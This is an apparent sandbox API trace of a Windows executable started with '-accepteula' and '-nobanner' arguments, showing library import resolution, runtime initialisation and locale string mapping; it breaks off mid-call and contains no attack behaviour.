[0286.404] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0286.405] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0286.405] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0286.405] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0286.405] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0286.405] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0286.405] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0286.406] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0286.406] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0286.407] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0286.407] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0286.407] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0286.407] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0286.407] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0286.407] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0286.407] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0286.407] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0286.407] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0286.407] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0286.407] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0286.407] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0286.407] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0286.407] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0286.407] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0286.408] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0286.408] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0286.408] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0286.408] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0286.408] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0286.408] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0286.408] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0286.408] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0286.408] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0286.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x58334e82, dwHighDateTime=0x1d45ac6)) [0286.408] GetCurrentThreadId () returned 0xe98 [0286.408] GetCurrentProcessId () returned 0x904 [0286.408] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=33387090650) returned 1 [0286.408] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0286.409] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0286.410] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0286.411] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0286.411] GetCurrentThreadId () returned 0xe98 [0286.411] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x9fe18149, hStdError=0x475810)) [0286.411] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0286.411] GetFileType (hFile=0x38) returned 0x2 [0286.411] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0286.412] GetFileType (hFile=0xc0) returned 0x3 [0286.412] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0286.412] GetFileType (hFile=0x40) returned 0x2 [0286.412] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" [0286.412] GetEnvironmentStringsW () returned 0x231e78* [0286.412] FreeEnvironmentStringsW (penv=0x231e78) returned 1 [0286.412] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0286.413] GetLastError () returned 0x0 [0286.413] SetLastError (dwErrCode=0x0) [0286.413] GetLastError () returned 0x0 [0286.413] SetLastError (dwErrCode=0x0) [0286.413] GetLastError () returned 0x0 [0286.413] SetLastError (dwErrCode=0x0) [0286.413] GetACP () returned 0x4e4 [0286.413] GetLastError () returned 0x0 [0286.413] SetLastError (dwErrCode=0x0) [0286.413] IsValidCodePage (CodePage=0x4e4) returned 1 [0286.413] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0286.413] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0286.413] GetLastError () returned 0x0 [0286.413] SetLastError (dwErrCode=0x0) [0286.413] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0286.413] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0286.413] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0286.413] GetLastError () returned 0x0 [0286.413] SetLastError (dwErrCode=0x0) [0286.413] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0286.413] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0286.413] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0286.414] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0286.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xd9\x80\xe1\x9f\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0286.414] GetLastError () returned 0x0 [0286.414] SetLastError (dwErrCode=0x0) [0286.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0286.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0286.414] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0286.414] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0286.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\